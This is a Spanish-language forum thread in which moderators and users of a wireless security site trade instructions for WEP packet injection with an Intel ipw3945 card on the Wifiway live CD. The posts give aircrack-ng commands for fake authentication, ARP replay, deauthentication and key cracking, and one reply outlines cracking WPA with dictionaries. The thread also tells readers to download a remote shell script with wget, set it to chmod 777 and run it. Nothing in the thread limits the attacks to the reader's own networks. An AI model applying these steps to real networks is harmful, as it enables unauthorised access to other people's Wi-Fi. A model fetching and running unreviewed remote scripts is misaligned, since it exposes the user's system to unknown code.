Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?
09-Enero 12:08:09 (Viernes)
Inicio Ayuda Ingresar Registrarse
Noticias: Live CD wifiway-1.0 Final


Agregate al nuevo feed RSS 2.0 de seguridadwireless y mantente informado de forma resumida ===>
+  Seguridad Wireless
|-+  Suite Seguridad Wireless
| |-+  Manuales de Wifislax & Wifiway (Moderadores: ChimoC, the_often, chinitiw, drvalium)
| | |-+  Video + Manual: Inyeccion ipw3945
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 2 3 4 » Imprimir
Autor Tema: Video + Manual: Inyeccion ipw3945  (Leído 44479 veces)
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« en: 05-Mayo 14:57:17 (Sbado) »

Video inyeccion ipw3945

Espero que os ayude, y que os guste

Con formato de la web:

http://www.seguridadwireless.net/ipw3945.htm

Sin formato de la web: a fondo completo:

http://www.seguridadwireless.net/ipw3945full.htm

alojado ya en:

http://www.comprawifi-wifislax.com/public/wifiway/videos/hadrianweb_ipw3945.swf



En primer luegar abrimos la carpeta /sys/class/net/wifi0/device

Ahi modificamos el rate y lo ponemos a 2

En la misma carpeta modificaremos el archivo que pone bssid y pondremos la mac del ap
tambien modificamos el archivo que pone channel por el canal correspondiente.

Una vez echo esto podremos inyectar tal y como lo hacemos con la demas tarjetas, pero esa vez con una peculiardad y es que para capturar usaremos la rtap0 y para inyectar la interfaz wifi0

La inyeccion seria de la siguiente forma:
Hacemos lo siguiente:
Citar
airodump-ng rtap0
Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
Citar
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Y en otra terminal distinta hacemos lo siguiente:
Citar
aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
Citar
airodump-ng rtap0
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es

Citar
aircrack-ptw archivo.cap




P.D. Recordar levantar la interfaz wifi0 con el comando

Citar
ifconfig wifi0 up

----------------------------------------Edito-------------------------------------------


Segun acabo de leer(algo que puso rh3nt0n) el rate tambien se puede modificar con lo siguiente:

Tambien puedes usar lo siguiente:

Citar
ifconfig wifi0 down
chmod u+wrx /sys/class/net/wifi0/device/rate
echo 12 >/sys/class/net/wifi0/device/rate
echo <canal> >/sys/class/net/wifi0/device/channel


----------------


Bueno aqui les dejo un script que auntomatiza el proceso de el cambio de canal y rate asi como el del bssid

http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh


P.D.Si les dice algo de permiso denegado, lo unico que tienen que hacer es poner chmod 777 ipw3945.sh

Para ejecutarlo simplemente deben de poner

./ipw3945.sh

Espero que lo disfruten Grin Grin Grin

Directo con shell (terminal)

wget http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh
chmod 777 ipw3945.sh
./ipw3945.sh

Y dejar ese terminal abierto, por si quereis ir haciendo mas cambios, esta script sera añadida en futuras versiones.

« Última modificación: 20-Febrero 13:44:14 (Mircoles) por hadrianweb » En línea


juanjetomas
**
Desconectado Desconectado

Mensajes: 66


« Respuesta #1 en: 05-Mayo 15:22:59 (Sbado) »

Gracias campeón, eres el mejor, muchas gracia

 Grin  Grin  Grin

PD: ¿Cómo se mi mac?
« Última modificación: 05-Mayo 15:27:23 (Sbado) por juanjetomas » En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #2 en: 05-Mayo 15:43:10 (Sbado) »

Simplemetnes escribe ifconfig y te la pone (en wifi0 claro esta)
En línea


hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #3 en: 05-Mayo 16:08:22 (Sbado) »

Bueno queda editado para el que quiera hacerlo de las dos formas.

Una cosa interesante, para el ataque 1 recordar ponerle despues del 1 los segundos yo lo pongo 0 por que con que se asocie una vez ya es suficiente
En línea


juanjetomas
**
Desconectado Desconectado

Mensajes: 66


« Respuesta #4 en: 05-Mayo 16:20:25 (Sbado) »

Manual seguido paso a paso, y nada, leyendo paquetes se queda, lo que he observado es que ahora lee los paquetes mas lento.

hadrianweb, ¿cuanto te tarda en pillar el arp?

Es que cuando me asocio, me da un error, y me dice (en ingles) puede ser por estos motivos: no me acuerdo cuales son

Si alguien pudiera ponerme como conectarme a una red inalambrica mediante (seguramente con comandos), me ahorraría estar entrando y saliendo de windows, para mirar en el foro


Saludos



En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #5 en: 05-Mayo 16:27:29 (Sbado) »

En primer lugar el recuerda que en la asociacion(ataque 1) debes poner ese 0, por que sino a mi tambien me daba el error

En segundo lugar una de las opciones de ese error de be de ser el rate asi que lo que debes hacer es comprobar si el rate esta bien.


Y finalmente, justo despues de empezar a inyectar comprueba que en el archivo bssid tienes la mac correcta y no 00:00:00:00:00
En línea


juanjetomas
**
Desconectado Desconectado

Mensajes: 66


« Respuesta #6 en: 05-Mayo 16:39:17 (Sbado) »

Ok, voy a intentarlo de nuevo  Grin

Si  me sale(o no), tendré que volver a windows para contarlo, ya que no puedo navegar desde wifiway.

Pero la verdad es que me estoy liando con los nombres,¿ bssid es la mac, o station es la mac?
Es que si no tengo estos conceptos claros, poco voy a poder hacer.

Si alguien sabe como conectar, que lo cuente
« Última modificación: 05-Mayo 16:43:37 (Sbado) por juanjetomas » En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #7 en: 05-Mayo 16:40:33 (Sbado) »

jaja ahora te lo digo
En línea


Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 11299



WWW
« Respuesta #8 en: 05-Mayo 17:05:32 (Sbado) »

La conexion, bueno en esto no me podeis meter la bronca, esos drivers estan como vienen.

Supongo que habra que preguntarlo en:

http://intellinuxwireless.org/

Igual hay que cambiar de forama temporal con esto:

http://intellinuxwireless.org/?p=iwlwifi&n=howto-iwlwifi
En línea

guanchito03
*
Desconectado Desconectado

Mensajes: 11


« Respuesta #9 en: 05-Mayo 17:44:48 (Sbado) »

Hola!! Felicidades por la distribución.

Pero aun no he consigo que me inyecte, he seguido los pasos y se me queda cuando utilizo
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Me sale sending authentication request todo el rato Sad.
He realizado todos los pasos que salen en este post, en cuanto al archivo bssid me extraña q le introdujo la mac del ap, pero luego despues de utilizar este comando pues se me pone a 00:00:... de nuevo.
 Aver si alguien me ayuda. Saludos

En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #10 en: 05-Mayo 17:48:50 (Sbado) »

Bueno aqui les dejo un script que auntomatiza el proceso de el cambio de canal y rate asi como el del bssid

http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh


P.D.Si les dice algo de permiso denegado, lo unico que tienen que hacer es poner chmod 777 ipw3945.sh

Para ejecutarlo simplemente deben de poner

./ipw3945.sh

Espero que lo disfruten Grin Grin Grin
« Última modificación: 05-Mayo 18:04:04 (Sbado) por hadrianweb » En línea


hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #11 en: 05-Mayo 17:53:20 (Sbado) »

Hola!! Felicidades por la distribución.

Pero aun no he consigo que me inyecte, he seguido los pasos y se me queda cuando utilizo
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Me sale sending authentication request todo el rato Sad.
He realizado todos los pasos que salen en este post, en cuanto al archivo bssid me extraña q le introdujo la mac del ap, pero luego despues de utilizar este comando pues se me pone a 00:00:... de nuevo.
 Aver si alguien me ayuda. Saludos



Si te puso 00:00... pues en medio de la inyeccion cambiala y punto, porque asi es mas seguro
En línea


hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #12 en: 05-Mayo 18:18:02 (Sbado) »

Editado, jeje ahora ya tenemos un script que lo hace todo Grin Grin
En línea


Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 11299



WWW
« Respuesta #13 en: 05-Mayo 18:37:01 (Sbado) »

bueno estoy contento por el tema de la ipw3945, los demas temas ya se iran tocando y se corregira lo que pueda para nuevas versiones, no hay prisa.
En línea

blackice2020
*
Desconectado Desconectado

Mensajes: 3


« Respuesta #14 en: 05-Mayo 18:55:42 (Sbado) »

Hola soy nuevo y estoy intentando inyectar con mi ipw3945
Tengo unas dudas, espero que me puedan ayudar a solucionarlas:

1º En donde tengo que guardar ./ipw3945.sh para que me lo encuentre al estar desde wifiway, puesto que lo guarde en un archivo que tengo en windows y cuando entro en wifiway lo ejecuto y me dice q no lo encuentra

2º Cuando modifico los archivos que me manda en el tutorial me dice que no puedo guardarlos. Es debido a que estoy ejecutando desde el live cd?

Espero que me puedan ayudar.

Un saludo y gracias de antemano
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #15 en: 05-Mayo 18:59:47 (Sbado) »

Bueno en primer lugar el script ya modifica los archivos que dice el tutorial, asi que comencemos por lo del script

Entras en el directorio /mnt/
y ahi veras tus particiones, entras en la de windows y buscas donde te descargaste el archivo

Una vez encontrado, coges y lo copias en /root
Luego simplemente debes de hacer desde la terminal lo siguiente

chmod 777 ipw3945
./ipw3945.sh
En línea


blackice2020
*
Desconectado Desconectado

Mensajes: 3


« Respuesta #16 en: 05-Mayo 19:07:12 (Sbado) »

Gracias voy a intentarlo.
Saludos
En línea
guanchito03
*
Desconectado Desconectado

Mensajes: 11


« Respuesta #17 en: 05-Mayo 19:24:13 (Sbado) »

Llevo una hora con 400000 paquetes enviados y apenas 78 ARP, no se lo q me falta. Tb le cuesta autentificarse. Tengo q hacer varios intentos para q lo haga.
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #18 en: 05-Mayo 19:26:32 (Sbado) »

Asegurate de que el archivo bssid esta cambiado, por el bssid del ap
En línea


blackice2020
*
Desconectado Desconectado

Mensajes: 3


« Respuesta #19 en: 05-Mayo 19:27:45 (Sbado) »

Acabo de intentar busar en el gestor de ficheros de wifiway y no consigo encontar mis documentos
Te agradecería que me comentases una ubicacion para el archivo q consideres acertada y me puedas decir como acceder a ella, ya te comente antes q no tengo idea de linux y por lo tanto me cuesta encontrar las cosas aunque me gustaría aprender.

Gracias
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #20 en: 05-Mayo 19:34:42 (Sbado) »

jaja, ok te explico, desde windows te descargas el archivo, en el propio disco duro, sera lo mas facil, es decir en c:/

Luego una vez inicies el wifiway, el quito icono de los que aparece abajo lo abres, si te fijas el icono es una carpeta, te abre una ventana y a la izquierda aparece Sistema de ficheros, pues le das ahi, y luego en el apartado de la derecha pues buscas la carpeta mnt y la abres(con dos clicks) luego abres tu correspondiente particion de windows que puede ser o bien sda o hda u otra, y justo dentro de esa carpeta te tiene que aparece al ipw3945.sh,
entonces lo compias y lo pegas en /root, la carpeta root te aparece a la izquierda tambien
En línea


hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #21 en: 05-Mayo 19:36:08 (Sbado) »

Si tienes una tarjeta wifi usb, que tenga el soporte correspondiente,  se podria hacer directamente
En línea


guanchito03
*
Desconectado Desconectado

Mensajes: 11


« Respuesta #22 en: 05-Mayo 19:51:04 (Sbado) »

El archivo bssid si lo tengo bien. Lo dejo abierto para asegurarme q no me lo cambie, pero aun asi lo comprobe. Como se prueba otro tipo de ataque por si ve ma mejor??
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #23 en: 05-Mayo 19:59:56 (Sbado) »

Los ataque son aireplay -1 o -2 o -3 o -4 pero cada uno tiene sus difereciencias, todo es lo puedes encontrar en la pagina pricipal y en otros manuales
En línea


hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #24 en: 06-Mayo 23:26:07 (Domingo) »

Bueno tras un fin de semana completo con el video de la inyeccion de la ipw3945 al final lo he conseguido.

Ha costado mucho trabajo.

Video inyeccion ipw3945

Espero que os ayude, y que os guste

Con formato de la web:

http://www.seguridadwireless.net/ipw3945.htm

Sin formato de la web: a fondo completo:

http://www.seguridadwireless.net/ipw3945full.htm
« Última modificación: 07-Mayo 02:32:54 (Lunes) por hadrianweb » En línea


Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 11299



WWW
« Respuesta #25 en: 06-Mayo 23:40:32 (Domingo) »

pues yo me retiro ya, adios
En línea

hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #26 en: 07-Mayo 02:34:20 (Lunes) »

Bueno, y yo tambien me voy Grin Grin

Aqui se queda todo, por lo menos el video a quedado en la pagina y en el manual Grin
En línea


pianista
Chopchoping
Moderador Global
******
Desconectado Desconectado

Mensajes: 1450



WWW
« Respuesta #27 en: 07-Mayo 16:16:53 (Lunes) »

Probado el chopchop con la ipw y funciona perfectamente, un ataque muy recomendable para hacer cuando el A3 nos falla pero hay station conectada Grin
saludos
En línea

azzero
*
Desconectado Desconectado

Mensajes: 2


« Respuesta #28 en: 07-Mayo 16:49:22 (Lunes) »

Hola. pues he seguido los paso y todo bien hasta que hago el ataque 3. he esperado mas de 30min y no me suben los ARP. tengo un data de 40 pero los arp no suben. hay alguna forma de solucionarlo?? el atauqe 1 me funciona y me asocio bien, pero incluso al repetir no suben los ARP. Muchas gracias
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3622



WWW
« Respuesta #29 en: 07-Mayo 17:52:03 (Lunes) »

No se si habras visto el video, pero en el indico que para acelerar el proceso de los arp, utilizo el ataque 0 y luego lo paro, este ultimo paso, el de pararlo es muy importante por que sino no subiran nunca


para ejecutar el ataque 0 utiliza lo siguiente

Citar
aireplay-ng -0 30 -a mac_ap wifi0

Para paralo pulsa Ctrl+c
En línea


gruke
*
Desconectado Desconectado

Mensajes: 13


« Respuesta #30 en: 08-Mayo 05:35:34 (Martes) »

Y si fuera WPA?

Edito: Me he leido el foro un rato y por lo que veo es muy dificil sacar una WPA, primero necesitaria la handshake correcto?

Lo que no termino de entender es el cowpatty.
Seria posible con la ipw3945,suponiendo que tengo la clave en un Diccionario.
gracias

Cada vez me estoy acercando mas a linux Grin
« Última modificación: 08-Mayo 06:27:33 (Martes) por gruke » En línea
pianista
Chopchoping
Moderador Global
******
Desconectado Desconectado

Mensajes: 1450



WWW
« Respuesta #31 en: 08-Mayo 09:47:25 (Martes) »

Si, debes usar un A0 como el que tiene arriba hadrianweb hasta que consigas el handshake y despues pasarle diccionarios como un loco hasta que te la saque...
La verdad es que esta chungo...
Saludos